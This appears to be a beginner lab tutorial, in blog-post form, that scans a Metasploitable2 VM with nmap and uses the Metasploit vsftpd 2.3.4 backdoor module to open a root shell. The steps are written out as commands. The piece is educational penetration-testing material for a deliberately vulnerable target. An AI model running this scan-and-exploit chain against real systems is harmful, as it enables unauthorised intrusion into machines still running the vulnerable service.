One of the biggest turning points in learning cybersecurity is understanding how attackers move from: Discovery → Exploitation → Access In a training session I led, students went from running a simple scan to gaining root access on a vulnerable machine. The excitement was great — but the real value was understanding how and why it worked. In this guide, you'll replicate that exact process step by step. How to scan a target using Nmap How to identify vulnerable services How the vsftpd 2.3.4 backdoor works How to exploit it using Metasploit How to gain root access Make sure your lab is ready: Kali Linux (attacker) Metasploitable2 (target) Both machines on the same network (NAT or Host-only) On Metasploitable2: ifconfig Look for something like: 192.168.56.101 On Kali: nmap -sV target_ip Why -sV matters Detects service versions Key Result 👉 This is your entry point. vsftpd 2.3.4 contains a backdoor. Trigger condition: This is intentionally vulnerable — perfect for learning exploitation. msfconsole search vsftpd Expected result: use exploit/unix/ftp/vsftpd_234_backdoor set RHOST target_ip run Command shell session 1 opened whoami Output: root 🎉 You now have root access. Key Concepts (Simple Breakdown) Reconnaissance Enumeration Exploitation Metasploit Common Beginner Mistakes Skipping Version Detection Wrong: nmap target_ip Correct: nmap -sV target_ip Using the Wrong IP Mixing attacker and target IP Using 127.0.0.1 incorrectly ✔ Always verify: ifconfig Network Misconfiguration If nothing works: Check both VMs are on the same network Forgetting RHOST Blindly Running Exploits Don’t just run tools — ask: Why does this vulnerability exist? Use a workflow: Scan This lab shows a complete beginner-friendly attack chain: Discover a service Even though this is a deliberately vulnerable system, the process is exactly how real penetration testing works. The goal is not just to hack — but to understand. Next Steps If you're learning cybersecurity: Stay consistent. Follow for more hands-on cybersecurity labs and real-world breakdowns.